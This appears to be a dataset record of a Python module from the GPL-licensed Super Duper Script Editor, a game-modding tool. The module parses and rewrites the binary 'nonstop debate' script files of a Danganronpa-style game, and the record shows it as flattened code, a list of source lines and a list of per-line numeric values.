"kokoro_09_004.dat": "e09_704_101.lin", "kokoro_09_005.dat": "e09_705_101.lin", "kokoro_09_006.dat": "e09_706_101.lin", "kokoro_09_007.dat": "e09_707_101.lin", "kokoro_09_008.dat": "e09_708_101.lin", "kokoro_09_009.dat": "e09_709_101.lin", "kokoro_09_010.dat": "e09_710_101.lin", "kokoro_09_011.dat": "e09_711_101.lin", "kokoro_09_012.dat": "e09_712_101.lin", "kokoro_09_013.dat": "e09_713_101.lin", 
"kokoro_09_014.dat": "e09_714_101.lin", "kokoro_09_015.dat": "e09_715_101.lin", } class NonstopLine(): def __init__(self): self.file_num = -1 self.line_type = -1 self.ammo_id = -1 self.converted_id = -1 self.unknown1 = -1 self.weak_point = -1 self.delay = -1 self.orientation = -1 self.in_effect = -1 self.out_effect = -1 self.time_visible = -1 self.x_start = -1 self.y_start = -1 self.velocity = -1 self.angle = -1 self.zoom_start = -1 self.zoom_change = -1 self.shake = -1 self.rot_angle = -1 self.spin_vel = -1 self.speaker = -1 self.char_id = -1 self.sprite_id = -1 self.unknown3 = -1 self.voice_id = -1 self.unknown4 = -1 self.chapter = -1 self.unknown5 = -1 self.unknown6 = -1 def to_data(self): data = \ ConstBitStream(uintle = self.file_num, length = 16) + \ [key for key, value in LINE_TYPE_MAP.iteritems() if value == self.line_type][0] + \ ConstBitStream(uintle = self.ammo_id, length = 16) + \ ConstBitStream(uintle = self.converted_id, length = 16) + \ self.unknown1 + \ ConstBitStream(uintle = self.weak_point, length = 16) + \ ConstBitStream(intle = self.delay, length = 16) + \ ConstBitStream(intle = self.orientation, length = 16) + \ ConstBitStream(intle = self.in_effect, length = 16) + \ ConstBitStream(intle = self.out_effect, length = 16) + \ ConstBitStream(intle = self.time_visible, length = 16) + \ ConstBitStream(intle = self.x_start, length = 16) + \ ConstBitStream(intle = self.y_start, length = 16) + \ ConstBitStream(intle = self.velocity, length = 16) + \ ConstBitStream(intle = self.angle, length = 16) + \ ConstBitStream(intle = self.zoom_start, length = 16) + \ ConstBitStream(intle = self.zoom_change, length = 16) + \ ConstBitStream(intle = self.shake, length = 16) + \ ConstBitStream(intle = self.rot_angle, length = 16) + \ ConstBitStream(intle = self.spin_vel, length = 16) + \ ConstBitStream(uintle = self.char_id, length = 16) + \ ConstBitStream(uintle = self.sprite_id, length = 16) + \ self.unknown3 + \ ConstBitStream(uintle = self.voice_id, length = 16) 
+ \ self.unknown4 + \ ConstBitStream(uintle = self.chapter, length = 16) + \ self.unknown5 + \ self.unknown6 return data class NonstopParser(): def __init__(self): self.script_pack = ScriptPack() self.filename = "" self.magic = None self.lines = [] def save(self, filename): data = BitStream(self.magic) + BitStream(uintle = len(self.lines), length = 16) for line in self.lines: data += line.to_data() with open(filename, "wb") as f: data.tofile(f) def load(self, filename): filename = filename.lower() if not filename in DIR_MAP: _LOGGER.error("Invalid nonstop file: %s" % filename) return self.filename = filename script_dir = DIR_MAP[filename] self.script_pack = ScriptPack(script_dir, common.editor_config.data01_dir) file_order = [] # --- NONSTOP FORMAT --- # XX XX -- ??? # XX XX -- Number of lines (not necessarily files) # # [68 bytes per line] # XX XX -- File number # XX XX XX XX # * 0x00000000 = normal line # * 0x01000100 = chatter # * 0x01000000 = ??? (Only appears in SDR2) # * 0x02000000 = ??? (Only appears in SDR2) # * 0x03000000 = ??? (Only appears in SDR2) # * 0x04000000 = ??? (Only appears in SDR2) # XX XX -- Ammo ID that reacts to this line. # XX XX -- Converted line ID that reacts to this line. # XX XX -- ??? # XX XX -- 1 = has a weak point, 0 = has no weak point # XX XX -- The amount of time before the next line is shown (in sixtieths of seconds (frames?)). # XX XX -- Unknown (Possibly line orientation? Only 0 in the first game, but sometimes 2 in the second.) # XX XX -- Effect used when transitioning text in. # XX XX -- Effect used when transitioning text out. # * 0: fade # * 1: spin in/out # * 2: zoom out # * 3: slide in/out # XX XX -- The amount of the the line stays on-screen (in sixtieths of seconds (frames?)). # XX XX -- Initial X position (text centered around this pos). # XX XX -- Initial Y position (text centered around this pos). # XX XX -- Text velocity. # XX XX -- Angle of motion. # XX XX -- Initial text zoom (in percent). 
# XX XX -- Change in zoom over time (in percent). # * 90% means it gradually shrinks. # * 100% means it stays the same size the whole time. # * 110% means it gradually grows. # XX XX -- 0 = no shake, 1 = shake # XX XX -- Rotate the text clockwise to this angle. # XX XX -- Text spins clockwise at this rate. # XX XX -- Speaker (00 00 if chatter) # XX XX -- Sprite ID (00 00 if chatter) # XX XX XX XX -- ??? # XX XX -- Voice index (FF FF if chatter) # XX XX -- ??? # XX XX -- Chapter # XX XX XX XX -- ??? (padding?) nonstop = ConstBitStream(filename = os.path.join(common.editor_config.data01_dir, NONSTOP_DIR, self.filename)) self.magic = nonstop.read(16) num_lines = nonstop.read('uintle:16') # Four byte header plus 68 bytes per line. if nonstop.len < (4 + (num_lines * 68)) * 8: raise Exception("Invalid nonstop file.") prev_non_chatter = -1 self.lines = [] for i in range(num_lines): line = NonstopLine() line.file_num = nonstop.read('uintle:16') line.line_type = nonstop.read(32) if line.line_type in LINE_TYPE_MAP: line.line_type = LINE_TYPE_MAP[line.line_type] line.ammo_id = nonstop.read('intle:16') line.converted_id = nonstop.read('intle:16') line.unknown1 = nonstop.read(16) line.weak_point = nonstop.read('uintle:16') line.delay = nonstop.read('intle:16') line.orientation = nonstop.read('intle:16') line.in_effect = nonstop.read('intle:16') line.out_effect = nonstop.read('intle:16') line.time_visible = nonstop.read('intle:16') line.x_start = nonstop.read('intle:16') line.y_start = nonstop.read('intle:16') line.velocity = nonstop.read('intle:16') line.angle = nonstop.read('intle:16') line.zoom_start = nonstop.read('intle:16') line.zoom_change = nonstop.read('intle:16') line.shake = nonstop.read('intle:16') line.rot_angle = nonstop.read('intle:16') line.spin_vel = nonstop.read('intle:16') line.speaker = nonstop.read('intle:16') # Since we mess with speaker a little bit later, we want to keep the ID for the sprite. 
line.char_id = line.speaker line.sprite_id = nonstop.read('intle:16') line.unknown3 = nonstop.read(32) line.voice_id = nonstop.read('intle:16') line.unknown4 = nonstop.read(16) line.chapter = nonstop.read('intle:16') line.unknown5 = nonstop.read(32) line.unknown6 = nonstop.read(64) format = copy.deepcopy(TEXT_FORMATS[common.SCENE_MODES.debate]) format.orient = TEXT_ORIENT.hor if line.orientation == 0 else TEXT_ORIENT.ver format.align = TEXT_ALIGN.center if format.orient == TEXT_ORIENT.ver: format.y = format.h format.x = format.w / 3.5 self.script_pack[line.file_num].scene_info.format = format if line.line_type == NONSTOP_LINE_TYPE.normal: prev_non_chatter = line.file_num # Fixing some weirdness. # if filename in ["nonstop_06_003.dat", "nonstop_06_005.dat", "nonstop_06_006.dat", "nonstop_06_007.dat"] and line.speaker == 16: # line.speaker = 15 # if filename[:10] == "nonstop_06" and int(filename[11:14]) >= 10 and line.speaker == 10: # line.speaker = 18 # if filename in ["nonstop_02_003.dat", "nonstop_02_005.dat", "nonstop_04_005.dat", "nonstop_04_006.dat"] and line.speaker == 10: # line.speaker = 18 self.script_pack[line.file_num].scene_info.speaker = line.speaker sprite = SpriteId(SPRITE_TYPE.stand, line.char_id, line.sprite_id) self.script_pack[line.file_num].scene_info.sprite = sprite voice = VoiceId(line.speaker, line.chapter, line.voice_id) self.script_pack[line.file_num].scene_info.voice = voice self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.debate elif "hanron" in str(line.line_type): self.script_pack[line.file_num].scene_info.speaker = line.speaker sprite = SpriteId(SPRITE_TYPE.stand, line.char_id, line.sprite_id) self.script_pack[line.file_num].scene_info.sprite = sprite voice = VoiceId(line.speaker, line.chapter, line.voice_id) self.script_pack[line.file_num].scene_info.voice = voice self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.hanron elif line.line_type == NONSTOP_LINE_TYPE.chatter: 
self.script_pack[line.file_num].scene_info.speaker = -1 self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.chatter self.script_pack[line.file_num].scene_info.extra_val = prev_non_chatter else: _LOGGER.error("Invalid line type: %s" % line.line_type) file_order.append(line.file_num) self.lines.append(line) for index in xrange(len(self.script_pack)): if not index in file_order: file_order.append(index) self.script_pack.script_files = [self.script_pack[i] for i in file_order] if __name__ == "__main__": pass debates = [ # "hanron_01_001.dat", # "hanron_01_002.dat", # "hanron_01_003.dat", "hanron_02_001.dat", "hanron_02_002.dat", # "hanron_03_001.dat", # "hanron_03_002.dat", # "hanron_04_001.dat", # "hanron_04_002.dat", # "hanron_04_003.dat", # "hanron_05_001.dat", # "hanron_05_002.dat", # "hanron_06_001.dat", # "nonstop_01_001.dat", # "nonstop_01_002.dat", # "nonstop_01_003.dat", # "kokoro_09_001.dat", # "kokoro_09_002.dat", # "kokoro_09_003.dat", # "kokoro_09_004.dat", # "kokoro_09_005.dat", # "kokoro_09_006.dat", # "kokoro_09_007.dat", # "kokoro_09_008.dat", # "kokoro_09_009.dat", # "kokoro_09_010.dat", # "kokoro_09_011.dat", # "kokoro_09_012.dat", # "kokoro_09_013.dat", # "kokoro_09_014.dat", # "kokoro_09_015.dat", ] for debate in debates: parser = NonstopParser() parser.load(debate) for line in parser.lines: print "%4d %2d %2d %3d %s" % (line.file_num, line.orientation, line.speaker, line.voice_id, line.line_type) print ### EOF ###
[ "################################################################################\n", "### Copyright © 2012-2013 BlackDragonHunt\n", "### \n", "### This file is part of the Super Duper Script Editor.\n", "### \n", "### The Super Duper Script Editor is free software: you can redistribute it\n", "### and/or modify it under the terms of the GNU General Public License as\n", "### published by the Free Software Foundation, either version 3 of the License,\n", "### or (at your option) any later version.\n", "### \n", "### The Super Duper Script Editor is distributed in the hope that it will be\n", "### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "### GNU General Public License for more details.\n", "### \n", "### You should have received a copy of the GNU General Public License\n", "### along with the Super Duper Script Editor.\n", "### If not, see <http://www.gnu.org/licenses/>.\n", "################################################################################\n", "\n", "from bitstring import ConstBitStream, BitStream\n", "import copy\n", "import logging\n", "import os\n", "\n", "from enum import Enum\n", "\n", "import common\n", "from script_pack import ScriptPack\n", "from sprite import SpriteId, SPRITE_TYPE\n", "from text_format import TEXT_FORMATS, TEXT_ORIENT, TEXT_ALIGN\n", "from voice import VoiceId\n", "\n", "_LOGGER_NAME = common.LOGGER_NAME + \".\" + __name__\n", "_LOGGER = logging.getLogger(_LOGGER_NAME)\n", "\n", "NONSTOP_DIR = os.path.join(\"all\", \"bin\")\n", "\n", "NONSTOP_LINE_TYPE = Enum(\"normal\", \"chatter\", \"unknown1\", \"unknown3\", \"unknown4\", \"hanron1\", \"hanron2\", \"hanron3\", \"hanron4\", \"hanron5\", \"hanron6\", \"hanron7\", \"hanron8\", \"hanron_mc\")\n", "LINE_TYPE_MAP = {\n", " ConstBitStream(hex = \"0x00000000\"): NONSTOP_LINE_TYPE.normal,\n", " ConstBitStream(hex = \"0x01000100\"): NONSTOP_LINE_TYPE.chatter,\n", " 
ConstBitStream(hex = \"0x01000000\"): NONSTOP_LINE_TYPE.unknown1,\n", " ConstBitStream(hex = \"0x03000000\"): NONSTOP_LINE_TYPE.unknown3,\n", " ConstBitStream(hex = \"0x04000000\"): NONSTOP_LINE_TYPE.unknown4,\n", " ConstBitStream(hex = \"0x00000100\"): NONSTOP_LINE_TYPE.hanron1,\n", " ConstBitStream(hex = \"0x00000200\"): NONSTOP_LINE_TYPE.hanron2,\n", " ConstBitStream(hex = \"0x00000300\"): NONSTOP_LINE_TYPE.hanron3,\n", " ConstBitStream(hex = \"0x00000400\"): NONSTOP_LINE_TYPE.hanron4,\n", " ConstBitStream(hex = \"0x00000500\"): NONSTOP_LINE_TYPE.hanron5,\n", " ConstBitStream(hex = \"0x00000600\"): NONSTOP_LINE_TYPE.hanron6,\n", " ConstBitStream(hex = \"0x00000700\"): NONSTOP_LINE_TYPE.hanron7,\n", " ConstBitStream(hex = \"0x00000800\"): NONSTOP_LINE_TYPE.hanron8,\n", " ConstBitStream(hex = \"0x02000000\"): NONSTOP_LINE_TYPE.hanron_mc,\n", "}\n", "\n", "DIR_MAP = {\n", " \"nonstop_01_001.dat\": \"e01_202_001.lin\",\n", " \"nonstop_01_002.dat\": \"e01_204_001.lin\",\n", " \"nonstop_01_003.dat\": \"e01_208_001.lin\",\n", " \"nonstop_01_004.dat\": \"e01_210_001.lin\",\n", " \"nonstop_01_005.dat\": \"e01_212_001.lin\",\n", " \"nonstop_01_006.dat\": \"e01_216_001.lin\",\n", " \"nonstop_01_007.dat\": \"e01_222_001.lin\",\n", " \"nonstop_01_008.dat\": \"e01_224_001.lin\",\n", " \"nonstop_01_009.dat\": \"e01_228_001.lin\",\n", " \"hanron_01_001.dat\": \"e01_206_001.lin\",\n", " \"hanron_01_002.dat\": \"e01_214_001.lin\",\n", " \"hanron_01_003.dat\": \"e01_226_001.lin\",\n", " \n", " \"nonstop_02_001.dat\": \"e02_203_001.lin\",\n", " \"nonstop_02_002.dat\": \"e02_205_001.lin\",\n", " \"nonstop_02_003.dat\": \"e02_207_001.lin\",\n", " \"nonstop_02_004.dat\": \"e02_209_001.lin\",\n", " \"nonstop_02_005.dat\": \"e02_213_001.lin\",\n", " \"nonstop_02_006.dat\": \"e02_215_001.lin\",\n", " \"nonstop_02_007.dat\": \"e02_223_001.lin\",\n", " \"hanron_02_001.dat\": \"e02_217_001.lin\",\n", " \"hanron_02_002.dat\": \"e02_225_001.lin\",\n", " \n", " \"nonstop_03_001.dat\": 
\"\",\n", " \"nonstop_03_002.dat\": \"\",\n", " \"nonstop_03_003.dat\": \"\",\n", " \"nonstop_03_004.dat\": \"\",\n", " \"nonstop_03_005.dat\": \"\",\n", " \"nonstop_03_006.dat\": \"\",\n", " \"nonstop_03_007.dat\": \"\",\n", " \"nonstop_03_008.dat\": \"e03_235_001.lin\",\n", " \"hanron_03_001.dat\": \"e03_212_001.lin\",\n", " \"hanron_03_002.dat\": \"e03_220_001.lin\",\n", " \n", " \"nonstop_04_001.dat\": \"\",\n", " \"nonstop_04_002.dat\": \"\",\n", " \"nonstop_04_003.dat\": \"\",\n", " \"nonstop_04_004.dat\": \"\",\n", " \"nonstop_04_005.dat\": \"\",\n", " \"nonstop_04_006.dat\": \"\",\n", " \"nonstop_04_007.dat\": \"\",\n", " \"nonstop_04_008.dat\": \"\",\n", " \"nonstop_04_009.dat\": \"\",\n", " \"nonstop_04_010.dat\": \"\",\n", " \"hanron_04_001.dat\": \"e04_208_001.lin\",\n", " \"hanron_04_002.dat\": \"e04_227_001.lin\",\n", " \"hanron_04_003.dat\": \"e04_245_001.lin\",\n", " \n", " \"nonstop_05_001.dat\": \"\",\n", " \"nonstop_05_002.dat\": \"\",\n", " \"nonstop_05_003.dat\": \"\",\n", " \"nonstop_05_004.dat\": \"\",\n", " \"nonstop_05_005.dat\": \"\",\n", " \"nonstop_05_006.dat\": \"\",\n", " \"nonstop_05_007.dat\": \"\",\n", " \"hanron_05_001.dat\": \"e05_204_001.lin\",\n", " \"hanron_05_002.dat\": \"e05_242_001.lin\",\n", " \n", " \"nonstop_06_001.dat\": \"\",\n", " \"nonstop_06_002.dat\": \"\",\n", " \"nonstop_06_003.dat\": \"\",\n", " \"nonstop_06_004.dat\": \"\",\n", " \"nonstop_06_005.dat\": \"\",\n", " \"nonstop_06_006.dat\": \"\",\n", " \"nonstop_06_007.dat\": \"\",\n", " \"nonstop_06_008.dat\": \"\",\n", " \"nonstop_06_009.dat\": \"\",\n", " \"nonstop_06_017.dat\": \"\",\n", " \n", " \"nonstop_14_001.dat\": \"\",\n", " \"nonstop_14_002.dat\": \"\",\n", " \"nonstop_14_003.dat\": \"\",\n", " \"nonstop_14_004.dat\": \"\",\n", " \"nonstop_14_005.dat\": \"\",\n", " \"nonstop_14_006.dat\": \"\",\n", " \"nonstop_14_007.dat\": \"\",\n", " \"nonstop_14_008.dat\": \"\",\n", " \n", " \"kokoro_09_001.dat\": \"e09_701_101.lin\",\n", " \"kokoro_09_002.dat\": 
\"e09_702_101.lin\",\n", " \"kokoro_09_003.dat\": \"e09_703_101.lin\",\n", " \"kokoro_09_004.dat\": \"e09_704_101.lin\",\n", " \"kokoro_09_005.dat\": \"e09_705_101.lin\",\n", " \"kokoro_09_006.dat\": \"e09_706_101.lin\",\n", " \"kokoro_09_007.dat\": \"e09_707_101.lin\",\n", " \"kokoro_09_008.dat\": \"e09_708_101.lin\",\n", " \"kokoro_09_009.dat\": \"e09_709_101.lin\",\n", " \"kokoro_09_010.dat\": \"e09_710_101.lin\",\n", " \"kokoro_09_011.dat\": \"e09_711_101.lin\",\n", " \"kokoro_09_012.dat\": \"e09_712_101.lin\",\n", " \"kokoro_09_013.dat\": \"e09_713_101.lin\",\n", " \"kokoro_09_014.dat\": \"e09_714_101.lin\",\n", " \"kokoro_09_015.dat\": \"e09_715_101.lin\",\n", "}\n", "\n", "class NonstopLine():\n", " def __init__(self):\n", " self.file_num = -1\n", " self.line_type = -1\n", " self.ammo_id = -1\n", " self.converted_id = -1\n", " self.unknown1 = -1\n", " self.weak_point = -1\n", " \n", " self.delay = -1\n", " self.orientation = -1\n", " self.in_effect = -1\n", " self.out_effect = -1\n", " self.time_visible = -1\n", " self.x_start = -1\n", " self.y_start = -1\n", " self.velocity = -1\n", " self.angle = -1\n", " self.zoom_start = -1\n", " self.zoom_change = -1\n", " self.shake = -1\n", " self.rot_angle = -1\n", " self.spin_vel = -1\n", " \n", " self.speaker = -1\n", " \n", " self.char_id = -1\n", " self.sprite_id = -1\n", " \n", " self.unknown3 = -1\n", " self.voice_id = -1\n", " self.unknown4 = -1\n", " self.chapter = -1\n", " self.unknown5 = -1\n", " self.unknown6 = -1\n", " \n", " def to_data(self):\n", " data = \\\n", " ConstBitStream(uintle = self.file_num, length = 16) + \\\n", " [key for key, value in LINE_TYPE_MAP.iteritems() if value == self.line_type][0] + \\\n", " ConstBitStream(uintle = self.ammo_id, length = 16) + \\\n", " ConstBitStream(uintle = self.converted_id, length = 16) + \\\n", " self.unknown1 + \\\n", " ConstBitStream(uintle = self.weak_point, length = 16) + \\\n", " ConstBitStream(intle = self.delay, length = 16) + \\\n", " 
ConstBitStream(intle = self.orientation, length = 16) + \\\n", " ConstBitStream(intle = self.in_effect, length = 16) + \\\n", " ConstBitStream(intle = self.out_effect, length = 16) + \\\n", " ConstBitStream(intle = self.time_visible, length = 16) + \\\n", " ConstBitStream(intle = self.x_start, length = 16) + \\\n", " ConstBitStream(intle = self.y_start, length = 16) + \\\n", " ConstBitStream(intle = self.velocity, length = 16) + \\\n", " ConstBitStream(intle = self.angle, length = 16) + \\\n", " ConstBitStream(intle = self.zoom_start, length = 16) + \\\n", " ConstBitStream(intle = self.zoom_change, length = 16) + \\\n", " ConstBitStream(intle = self.shake, length = 16) + \\\n", " ConstBitStream(intle = self.rot_angle, length = 16) + \\\n", " ConstBitStream(intle = self.spin_vel, length = 16) + \\\n", " ConstBitStream(uintle = self.char_id, length = 16) + \\\n", " ConstBitStream(uintle = self.sprite_id, length = 16) + \\\n", " self.unknown3 + \\\n", " ConstBitStream(uintle = self.voice_id, length = 16) + \\\n", " self.unknown4 + \\\n", " ConstBitStream(uintle = self.chapter, length = 16) + \\\n", " self.unknown5 + \\\n", " self.unknown6\n", " \n", " return data\n", "\n", "class NonstopParser():\n", " def __init__(self):\n", " self.script_pack = ScriptPack()\n", " self.filename = \"\"\n", " self.magic = None\n", " self.lines = []\n", " \n", " def save(self, filename):\n", " \n", " data = BitStream(self.magic) + BitStream(uintle = len(self.lines), length = 16)\n", " \n", " for line in self.lines:\n", " data += line.to_data()\n", " \n", " with open(filename, \"wb\") as f:\n", " data.tofile(f)\n", " \n", " def load(self, filename):\n", " filename = filename.lower()\n", " \n", " if not filename in DIR_MAP:\n", " _LOGGER.error(\"Invalid nonstop file: %s\" % filename)\n", " return\n", " \n", " self.filename = filename\n", " \n", " script_dir = DIR_MAP[filename]\n", " self.script_pack = ScriptPack(script_dir, common.editor_config.data01_dir)\n", " \n", " file_order = []\n", 
" \n", " # --- NONSTOP FORMAT ---\n", " # XX XX -- ???\n", " # XX XX -- Number of lines (not necessarily files)\n", " # \n", " # [68 bytes per line]\n", " # XX XX -- File number\n", " # XX XX XX XX\n", " # * 0x00000000 = normal line\n", " # * 0x01000100 = chatter\n", " # * 0x01000000 = ??? (Only appears in SDR2)\n", " # * 0x02000000 = ??? (Only appears in SDR2)\n", " # * 0x03000000 = ??? (Only appears in SDR2)\n", " # * 0x04000000 = ??? (Only appears in SDR2)\n", " # XX XX -- Ammo ID that reacts to this line.\n", " # XX XX -- Converted line ID that reacts to this line.\n", " # XX XX -- ???\n", " # XX XX -- 1 = has a weak point, 0 = has no weak point\n", " # XX XX -- The amount of time before the next line is shown (in sixtieths of seconds (frames?)).\n", " # XX XX -- Unknown (Possibly line orientation? Only 0 in the first game, but sometimes 2 in the second.)\n", " # XX XX -- Effect used when transitioning text in.\n", " # XX XX -- Effect used when transitioning text out.\n", " # * 0: fade\n", " # * 1: spin in/out\n", " # * 2: zoom out\n", " # * 3: slide in/out\n", " # XX XX -- The amount of the the line stays on-screen (in sixtieths of seconds (frames?)).\n", " # XX XX -- Initial X position (text centered around this pos).\n", " # XX XX -- Initial Y position (text centered around this pos).\n", " # XX XX -- Text velocity.\n", " # XX XX -- Angle of motion.\n", " # XX XX -- Initial text zoom (in percent).\n", " # XX XX -- Change in zoom over time (in percent).\n", " # * 90% means it gradually shrinks.\n", " # * 100% means it stays the same size the whole time.\n", " # * 110% means it gradually grows.\n", " # XX XX -- 0 = no shake, 1 = shake\n", " # XX XX -- Rotate the text clockwise to this angle.\n", " # XX XX -- Text spins clockwise at this rate.\n", " # XX XX -- Speaker (00 00 if chatter)\n", " # XX XX -- Sprite ID (00 00 if chatter)\n", " # XX XX XX XX -- ???\n", " # XX XX -- Voice index (FF FF if chatter)\n", " # XX XX -- ???\n", " # XX XX -- Chapter\n", " # XX 
XX XX XX -- ??? (padding?)\n", " nonstop = ConstBitStream(filename = os.path.join(common.editor_config.data01_dir, NONSTOP_DIR, self.filename))\n", " \n", " self.magic = nonstop.read(16)\n", " num_lines = nonstop.read('uintle:16')\n", " \n", " # Four byte header plus 68 bytes per line.\n", " if nonstop.len < (4 + (num_lines * 68)) * 8:\n", " raise Exception(\"Invalid nonstop file.\")\n", " \n", " prev_non_chatter = -1\n", " self.lines = []\n", " \n", " for i in range(num_lines):\n", " line = NonstopLine()\n", " \n", " line.file_num = nonstop.read('uintle:16')\n", " \n", " line.line_type = nonstop.read(32)\n", " if line.line_type in LINE_TYPE_MAP:\n", " line.line_type = LINE_TYPE_MAP[line.line_type]\n", " \n", " line.ammo_id = nonstop.read('intle:16')\n", " line.converted_id = nonstop.read('intle:16')\n", " line.unknown1 = nonstop.read(16)\n", " line.weak_point = nonstop.read('uintle:16')\n", " \n", " line.delay = nonstop.read('intle:16')\n", " line.orientation = nonstop.read('intle:16')\n", " line.in_effect = nonstop.read('intle:16')\n", " line.out_effect = nonstop.read('intle:16')\n", " line.time_visible = nonstop.read('intle:16')\n", " line.x_start = nonstop.read('intle:16')\n", " line.y_start = nonstop.read('intle:16')\n", " line.velocity = nonstop.read('intle:16')\n", " line.angle = nonstop.read('intle:16')\n", " line.zoom_start = nonstop.read('intle:16')\n", " line.zoom_change = nonstop.read('intle:16')\n", " line.shake = nonstop.read('intle:16')\n", " line.rot_angle = nonstop.read('intle:16')\n", " line.spin_vel = nonstop.read('intle:16')\n", " \n", " line.speaker = nonstop.read('intle:16')\n", " \n", " # Since we mess with speaker a little bit later, we want to keep the ID for the sprite.\n", " line.char_id = line.speaker\n", " line.sprite_id = nonstop.read('intle:16')\n", " \n", " line.unknown3 = nonstop.read(32)\n", " line.voice_id = nonstop.read('intle:16')\n", " line.unknown4 = nonstop.read(16)\n", " line.chapter = nonstop.read('intle:16')\n", " 
line.unknown5 = nonstop.read(32)\n", " line.unknown6 = nonstop.read(64)\n", " \n", " format = copy.deepcopy(TEXT_FORMATS[common.SCENE_MODES.debate])\n", " format.orient = TEXT_ORIENT.hor if line.orientation == 0 else TEXT_ORIENT.ver\n", " format.align = TEXT_ALIGN.center\n", " \n", " if format.orient == TEXT_ORIENT.ver:\n", " format.y = format.h\n", " format.x = format.w / 3.5\n", " \n", " self.script_pack[line.file_num].scene_info.format = format\n", " \n", " if line.line_type == NONSTOP_LINE_TYPE.normal:\n", " prev_non_chatter = line.file_num\n", " \n", " # Fixing some weirdness.\n", " # if filename in [\"nonstop_06_003.dat\", \"nonstop_06_005.dat\", \"nonstop_06_006.dat\", \"nonstop_06_007.dat\"] and line.speaker == 16:\n", " # line.speaker = 15\n", " # if filename[:10] == \"nonstop_06\" and int(filename[11:14]) >= 10 and line.speaker == 10:\n", " # line.speaker = 18\n", " # if filename in [\"nonstop_02_003.dat\", \"nonstop_02_005.dat\", \"nonstop_04_005.dat\", \"nonstop_04_006.dat\"] and line.speaker == 10:\n", " # line.speaker = 18\n", " \n", " self.script_pack[line.file_num].scene_info.speaker = line.speaker\n", " \n", " sprite = SpriteId(SPRITE_TYPE.stand, line.char_id, line.sprite_id)\n", " self.script_pack[line.file_num].scene_info.sprite = sprite\n", " \n", " voice = VoiceId(line.speaker, line.chapter, line.voice_id)\n", " self.script_pack[line.file_num].scene_info.voice = voice\n", " \n", " self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.debate\n", " \n", " elif \"hanron\" in str(line.line_type):\n", " \n", " self.script_pack[line.file_num].scene_info.speaker = line.speaker\n", " \n", " sprite = SpriteId(SPRITE_TYPE.stand, line.char_id, line.sprite_id)\n", " self.script_pack[line.file_num].scene_info.sprite = sprite\n", " \n", " voice = VoiceId(line.speaker, line.chapter, line.voice_id)\n", " self.script_pack[line.file_num].scene_info.voice = voice\n", " \n", " self.script_pack[line.file_num].scene_info.special = 
common.SCENE_SPECIAL.hanron\n", " \n", " elif line.line_type == NONSTOP_LINE_TYPE.chatter:\n", " self.script_pack[line.file_num].scene_info.speaker = -1\n", " self.script_pack[line.file_num].scene_info.special = common.SCENE_SPECIAL.chatter\n", " self.script_pack[line.file_num].scene_info.extra_val = prev_non_chatter\n", " \n", " else:\n", " _LOGGER.error(\"Invalid line type: %s\" % line.line_type)\n", " \n", " file_order.append(line.file_num)\n", " self.lines.append(line)\n", " \n", " for index in xrange(len(self.script_pack)):\n", " if not index in file_order:\n", " file_order.append(index)\n", " \n", " self.script_pack.script_files = [self.script_pack[i] for i in file_order]\n", "\n", "if __name__ == \"__main__\":\n", " pass\n", " debates = [\n", " # \"hanron_01_001.dat\",\n", " # \"hanron_01_002.dat\",\n", " # \"hanron_01_003.dat\",\n", " \"hanron_02_001.dat\",\n", " \"hanron_02_002.dat\",\n", " # \"hanron_03_001.dat\",\n", " # \"hanron_03_002.dat\",\n", " # \"hanron_04_001.dat\",\n", " # \"hanron_04_002.dat\",\n", " # \"hanron_04_003.dat\",\n", " # \"hanron_05_001.dat\",\n", " # \"hanron_05_002.dat\",\n", " # \"hanron_06_001.dat\",\n", " \n", " # \"nonstop_01_001.dat\",\n", " # \"nonstop_01_002.dat\",\n", " # \"nonstop_01_003.dat\",\n", " # \"kokoro_09_001.dat\",\n", " # \"kokoro_09_002.dat\",\n", " # \"kokoro_09_003.dat\",\n", " # \"kokoro_09_004.dat\",\n", " # \"kokoro_09_005.dat\",\n", " # \"kokoro_09_006.dat\",\n", " # \"kokoro_09_007.dat\",\n", " # \"kokoro_09_008.dat\",\n", " # \"kokoro_09_009.dat\",\n", " # \"kokoro_09_010.dat\",\n", " # \"kokoro_09_011.dat\",\n", " # \"kokoro_09_012.dat\",\n", " # \"kokoro_09_013.dat\",\n", " # \"kokoro_09_014.dat\",\n", " # \"kokoro_09_015.dat\",\n", " ]\n", " \n", " for debate in debates:\n", " parser = NonstopParser()\n", " parser.load(debate)\n", " for line in parser.lines:\n", " print \"%4d %2d %2d %3d %s\" % (line.file_num, line.orientation, line.speaker, line.voice_id, line.line_type)\n", " \n", " print\n", 
"\n", "### EOF ###" ]
[ 0.012345679012345678, 0.023809523809523808, 0.2, 0.017857142857142856, 0.2, 0.013157894736842105, 0.013513513513513514, 0.0125, 0.023255813953488372, 0.2, 0.012987012987012988, 0.013333333333333334, 0.015151515151515152, 0.02040816326530612, 0.2, 0.014285714285714285, 0.021739130434782608, 0.020833333333333332, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.00546448087431694, 0, 0.03125, 0.03076923076923077, 0.030303030303030304, 0.030303030303030304, 0.030303030303030304, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.03076923076923077, 0.029850746268656716, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.045454545454545456, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0, 0.037037037037037035, 0.037037037037037035, 0.2, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0.037037037037037035, 0, 